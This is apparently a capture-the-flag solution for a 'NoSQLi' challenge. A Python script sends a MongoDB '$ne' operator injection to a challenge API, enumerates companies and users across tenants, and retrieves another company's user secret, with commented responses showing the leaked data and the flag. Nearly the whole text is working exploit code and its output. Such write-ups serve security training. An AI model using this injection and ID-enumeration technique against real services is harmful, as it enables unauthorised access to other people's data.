Wizer - Challenge 5 - NoSQLi

Exploit

import requests

url = "https://chal5.vercel.app/api"


# w/ company id 08327cba-ba2d-4a95-983e-d13ee3d4693e get Willy Wonka's Secret


r = requests.post(
    url + "/companies",
    json={"company_id": {"$ne": "0"}},
)

print(r.text)


# [
#     {
#         "_id": "646bd3be36948f6269964fb0",
#         "company_id": "08131488-05a1-4bfd-abf7-b70191867ee6",
#         "company_name": "Thingamabob Industries, LTD.",
#     },
#     {
#         "_id": "646bd41236948f6269964fb1",
#         "company_id": "08327cba-ba2d-4a95-983e-d13ee3d4693e",
#         "company_name": "Thingamajig Enterprises, LLC.",
#     },
#     {
#         "_id": "646bd54736948f6269964fb2",
#         "company_id": "6d3e3f59-4b44-4f73-8009-c64bc598c4ca",
#         "company_name": "Thingy Corporation, Inc.",
#     },
# ]


r = requests.post(
    url + "/users",
    json={
        "company_ids": [
            "08327cba-ba2d-4a95-983e-d13ee3d4693e",
            "08131488-05a1-4bfd-abf7-b70191867ee6",
            "6d3e3f59-4b44-4f73-8009-c64bc598c4ca",
        ]
    },
)


print(r.text)


# [
#   {
#     "user_id": "790a4a9f-f3e2-4afc-a6d2-8744af3d7fed",
#     "company_id": "08131488-05a1-4bfd-abf7-b70191867ee6",
#     "name": "Willy Wonka"
#   },
#   {
#     "user_id": "f6bfcfcc-275b-49e8-b3d8-b4f6ae8e004a",
#     "company_id": "08131488-05a1-4bfd-abf7-b70191867ee6",
#     "name": "Charlie Bucket"
#   },
#   {
#     "user_id": "670b0741-9fb1-4ef7-afe9-842120a12fcb",
#     "company_id": "08131488-05a1-4bfd-abf7-b70191867ee6",
#     "name": "Grandpa Joe"
#   },
#   {
#     "user_id": "4dc6b6fa-963f-4c51-b100-d2c5def2498d",
#     "company_id": "08327cba-ba2d-4a95-983e-d13ee3d4693e",
#     "name": "Augustus Gloop"
#   },
#   {
#     "user_id": "5728f552-dccf-4b24-917d-f5353833e1f1",
#     "company_id": "08327cba-ba2d-4a95-983e-d13ee3d4693e",
#     "name": "Veruca Salt"
#   },
#   {
#     "user_id": "0c7230ca-fe54-4322-b57a-d918d3c807cf",
#     "company_id": "08327cba-ba2d-4a95-983e-d13ee3d4693e",
#     "name": "Violet Beauregarde"
#   },
#   {
#     "user_id": "0dff1247-e8a8-44dd-bf8b-fc44cbe32492",
#     "company_id": "6d3e3f59-4b44-4f73-8009-c64bc598c4ca",
#     "name": "Mike Teavee"
#   },
#   {
#     "user_id": "f408bb39-1a55-4442-a53e-81c475ad7a0c",
#     "company_id": "6d3e3f59-4b44-4f73-8009-c64bc598c4ca",
#     "name": "Arthur Slugworth"
#   },
#   {
#     "user_id": "8d06cdec-2cf0-4def-bbb7-201871c0d73f",
#     "company_id": "6d3e3f59-4b44-4f73-8009-c64bc598c4ca",
#     "name": "Prince Pondicherry"
#   }
# ]




r = requests.post(
    url + "/secret",
    json={"user_ids": ["790a4a9f-f3e2-4afc-a6d2-8744af3d7fed"]},
)

print(r.text)

# 67d54293-0249-44c8-b692-f98fe56853e3